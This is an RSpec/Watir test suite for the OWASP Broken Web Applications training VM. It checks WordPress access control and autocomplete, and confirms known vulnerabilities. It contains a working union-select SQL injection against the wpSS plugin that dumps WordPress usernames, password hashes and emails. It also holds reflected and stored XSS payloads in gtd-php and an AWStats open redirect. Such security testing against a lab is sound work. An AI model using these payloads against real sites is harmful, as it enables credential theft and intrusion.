OWASP Broken Web Applications: application-vulnerability unit tests written as a Watir-WebDriver/RSpec test
# encoding: utf-8
#http://code.google.com/p/owaspbwa/wiki/ProjectSummary
#http://sourceforge.net/apps/trac/owaspbwa/report/1
require 'rspec'
require 'watir-webdriver'
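# Base URL of the OWASP BWA lab host every example navigates to. It can be
# overridden through the BROKEN_WEB_APPS_HOST environment variable so the suite
# can be pointed at a differently-named lab VM without editing this file; when
# the variable is unset the original hard-coded default is used.
$BROKEN_WEB_APPS_HOST = ENV.fetch('BROKEN_WEB_APPS_HOST', 'http://owaspbwa')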
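# Checks against the WordPress instance shipped with OWASP BWA.
#
# A single browser is opened once for the whole group (before/after :all), so
# cookies and login state set up in one context carry over into the next. The
# contexts below are therefore order-dependent: the unauthenticated checks run
# first, then the 'admin' session, then the 'user' session.
describe 'OWASP Broken Web App: Wordpress' do
  # Navigate the shared browser to a path relative to the lab host.
  def visit(path)
    @browser.goto($BROKEN_WEB_APPS_HOST + path)
  end

  # Submit the WordPress login form with the given credentials.
  def login_as(username, password)
    visit '/wordpress/wp-login.php'
    @browser.text_field(:name, "log").set(username)
    @browser.text_field(:name, "pwd").set(password)
    @browser.button(:name, "submit").click
  end

  before(:all) do
    @browser = Watir::Browser.new
  end

  after(:all) do
    @browser.close
  end

  # Access-control baseline: public pages reachable, admin area redirected
  # to the login form.
  context "Without authenticating", :type => 'authorization' do
    specify "I should be able to access the blog" do
      visit '/wordpress/'
      @browser.title.include?('Broken WordPress').should be_true
    end

    specify "I should be able to access the login page" do
      visit '/wordpress/wp-login.php'
      @browser.title.include?('Login').should be_true
    end

    specify "I should not be able to access the WordPress Admin page" do
      visit '/wordpress/wp-admin/'
      # An anonymous request for wp-admin must land on the login page.
      @browser.title.include?('Login').should be_true
    end
  end

  context "After logging in as 'admin'," do
    before(:all) do
      login_as("admin", "admin")
    end

    specify "the page should list 'admin' as the authenticated user" do
      @browser.strong(:text, /admin/i).text.should eq('admin')
    end

    specify "I should be able to access the 'wp-admin' page", :type => 'authorization' do
      visit '/wordpress/wp-admin/'
      @browser.title.include?('Dashboard').should be_true
    end

    specify "I should be able to access the User Admin page", :type => 'authorization' do
      visit '/wordpress/wp-admin/users.php'
      @browser.title.include?('Users').should be_true
    end

    # NOTE(review): despite the description, nothing here logs the session
    # out; the login form is simply revisited with the still-authenticated
    # browser. Confirm whether the autocomplete check needs a fresh session.
    context 'After logging out, visiting the login page, and pressing the down arrow', :type => 'autocomplete' do
      before(:all) do
        visit '/wordpress/wp-login.php'
        # Two arrow-downs open the browser's autocomplete list and highlight
        # an entry; return accepts it into the username field.
        login_field = @browser.text_field(:name, /log/i)
        login_field.send_keys(:arrow_down)
        login_field.send_keys(:arrow_down)
        login_field.send_keys(:return)
      end

      specify "I shold see autocompleted usernames" do
        # A populated username field means the browser was allowed to remember
        # (and replay) a previously submitted login.
        username = @browser.text_field(:name, /log/i).value
        username.should_not be_nil
        username.should_not eq('')
        # The original had a bare `value.length > 0` here, which asserted
        # nothing; make it a real expectation.
        username.length.should > 0
      end
    end
  end

  # The 'user' login is submitted while the 'admin' session from the previous
  # context may still be active; whatever WordPress does with the old session
  # is the behaviour being relied on here.
  context "After logging in as 'user'," do
    before(:all) do
      login_as("user", "user")
    end

    specify "the page should list 'user' as the authenticated user" do
      @browser.strong(:text, /user/i).text.should eq('user')
    end

    specify "I should be able to access the 'wp-admin' page", :type => 'authorization' do
      visit '/wordpress/wp-admin/'
      @browser.title.include?('Dashboard').should be_true
    end

    specify "I should be not able to access the User Admin page", :type => 'authorization' do
      visit '/wordpress/wp-admin/users.php'
      # A low-privilege account must be refused the user-management page.
      @browser.html.include?('You do not have sufficient permissions to access this page.').should be_true
    end
  end

  # The wpSS plugin's ss_load.php passes ss_id straight into a query; the two
  # contexts below document the verbose database error it returns and the
  # resulting disclosure of account data.
  context 'On the ss_load.php page,', :type => 'sqli' do
    context 'When I enter a single quote into the ss_id URL parameter,' do
      before(:all) do
        visit "/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id='"
      end

      specify 'The application should respond with an SQL error message' do
        # A raw MySQL syntax error in the response is the detection signal
        # for an unparameterised query.
        @browser.html.include?("You have an error in your SQL syntax").should be_true
      end
    end

    context 'When I enter an SQL Injection Payload,' do
      before(:all) do
        visit %q|/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--|
      end

      specify "I should see the 'admin' account details" do
        # The spreadsheet widget renders the injected wp_users row; the
        # address below is the one the lab image ships with.
        @browser.div(:id, 's1_spreadsheetBars').text.include?('[email protected]').should be_true
      end
    end
  end
end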
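# Checks against two further OWASP BWA applications sharing one browser.
#
# NOTE(review): the group is named after AWStats, but the first two contexts
# exercise /gtd-php/ pages; only the open-redirect context touches /awstats/.
# Consider splitting or renaming the group.
describe 'OWASP Broken Web App: AWStats' do
  # Navigate the shared browser to a path relative to the lab host.
  def visit(path)
    @browser.goto($BROKEN_WEB_APPS_HOST + path)
  end

  # Accept the currently open JavaScript alert; raises when there is none.
  def accept_alert
    @browser.driver.switch_to.alert.accept
  end

  before(:all) do
    @browser = Watir::Browser.new
  end

  after(:all) do
    @browser.close
  end

  # Reflected XSS: the listTitle query parameter is echoed into the page
  # unescaped, so the script in it runs as soon as the page loads.
  context "When entering an XSS payload into the 'editList.php' page, ", :type => 'xss' do
    before(:all) do
      visit %q|/gtd-php/editList.php?listTitle=<script>alert('Achieved JavaScript Context')</script>|
    end

    specify 'An alert box should be displayed' do
      # Successfully accepting an alert proves the payload executed.
      expect { accept_alert }.to_not raise_error
    end
  end

  # Stored XSS: the checklist title is persisted and rendered unescaped.
  # The submitted payload stays in the application's data after the run,
  # so repeated runs accumulate checklists until the lab image is reset.
  context "When entering an XSS payload into the 'newChecklist.php' page", :type => 'stored_xss' do
    before(:all) do
      visit '/gtd-php/newChecklist.php'
      @browser.text_field(:name, 'title').set %q|"><script>alert(1)</script>|
      @browser.text_field(:name, 'description').set 'asdf'
      @browser.button(:name, 'submit').click
    end

    specify 'I should see an alert box after submitting the form' do
      expect { accept_alert }.to_not raise_error
    end

    context "When visiting the 'listChecklist.php' page, " do
      before(:all) do
        # The original never navigated here, so the example could only pass
        # on an alert left over from the form submission. The path is built
        # from the context description and the /gtd-php/ prefix used above;
        # confirm it against the lab image.
        visit '/gtd-php/listChecklist.php'
      end

      specify 'I should see an alert box' do
        # The alert fires again when the stored payload is rendered.
        expect { accept_alert }.to_not raise_error
      end
    end
  end

  # Open redirect: awredir.pl forwards to whatever 'url' it is given.
  context "When visiting the 'awredir.pl' page and specifying a 'url' of 'google.com', ", :type => 'open_redirect' do
    before(:all) do
      visit '/awstats/awredir.pl?url=google.com'
    end

    specify "The browser should be redirected to 'google.com'" do
      # Landing on Google's page shows the redirect target was not restricted
      # to the application's own host.
      @browser.title.should eq('Google')
    end
  end
end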